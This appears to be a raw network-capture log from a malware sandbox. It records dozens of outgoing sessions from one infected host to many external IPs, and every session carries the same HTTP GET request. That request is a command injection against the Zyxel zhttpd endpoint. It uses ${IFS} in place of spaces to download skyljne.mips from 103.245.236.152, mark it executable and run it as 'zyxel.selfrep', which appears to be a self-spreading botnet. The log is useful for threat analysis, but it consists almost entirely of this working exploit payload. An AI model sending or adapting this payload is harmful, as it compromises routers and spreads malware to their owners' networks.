                                      Jan 14, 2024 15:50:35.029160976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1517192.168.2.1444178205.221.159.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029181957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1518192.168.2.145338694.29.229.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029215097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1519192.168.2.1440294166.187.215.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029246092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1520192.168.2.143789823.20.82.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029309034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1521192.168.2.1438986156.0.116.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029339075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1522192.168.2.1452162171.17.80.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029380083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1523192.168.2.1435414101.72.188.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029443026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1524192.168.2.1440358151.44.239.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029479027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1525192.168.2.1456578144.106.168.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029520988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1526192.168.2.145975897.86.215.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029544115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1527192.168.2.144985695.150.216.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029575109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1528192.168.2.144116887.158.123.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029628038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1529192.168.2.144054635.72.247.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029670954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1530192.168.2.1437522121.42.149.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029702902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1531192.168.2.1444232202.11.94.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029757977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1532192.168.2.144479032.205.244.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029808044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1533192.168.2.1435928122.14.71.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029836893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1534192.168.2.143886041.12.2.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029875994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1535192.168.2.144867290.234.109.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029912949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1536192.168.2.1439536176.130.184.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029980898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1537192.168.2.144597634.33.151.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030015945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1538192.168.2.1454782223.197.28.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030082941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1539192.168.2.145946296.14.28.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030113935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1540192.168.2.1444004192.118.193.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030133009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1541192.168.2.1443922220.164.35.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030188084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1542192.168.2.1437042185.195.34.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030230045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1543192.168.2.1441294173.22.105.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030287027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1544192.168.2.144125041.6.54.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030320883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1545192.168.2.143485046.7.69.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030366898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1546192.168.2.144032453.157.20.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030421972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1547192.168.2.1449378159.122.172.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030452967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1548192.168.2.1458776157.60.236.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030483007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1549192.168.2.1451448206.199.89.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030520916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1550192.168.2.1458950193.122.107.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030567884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1551192.168.2.143492413.166.46.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030606031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1552192.168.2.144405039.222.5.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030637026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1553192.168.2.1446062139.155.73.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030674934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1554192.168.2.1436882178.160.90.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030693054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1555192.168.2.1443752118.239.229.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030721903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1556192.168.2.143589280.219.181.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030771971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1557192.168.2.144389825.69.181.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030800104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1558192.168.2.144635448.76.88.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030843019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1559192.168.2.1459112141.28.81.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030872107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1560192.168.2.1437570101.32.224.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030929089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1561192.168.2.1435318190.246.150.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030963898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1562192.168.2.1440680110.21.69.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.030989885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1563192.168.2.1446004136.233.53.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031024933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1564192.168.2.1448720151.5.154.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031063080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1565192.168.2.145975253.118.140.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031105042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1566192.168.2.1454030206.128.86.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031152964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1567192.168.2.143762647.193.181.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031193972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1568192.168.2.1436064155.86.98.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031219006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1569192.168.2.1445704161.178.66.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031264067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1570192.168.2.1449280195.149.138.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031311035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1571192.168.2.143330497.170.29.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031348944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1572192.168.2.144729057.101.36.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031399012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1573192.168.2.145077078.202.62.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031428099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1574192.168.2.1459422117.252.13.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031481028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1575192.168.2.1441526147.81.93.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031523943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1576192.168.2.1445306199.247.115.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031562090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1577192.168.2.1446136205.227.228.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.031593084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1578192.168.2.1440632213.114.64.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035118103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1579192.168.2.144038086.86.238.97443
                                      TimestampBytes transferredDirectionData
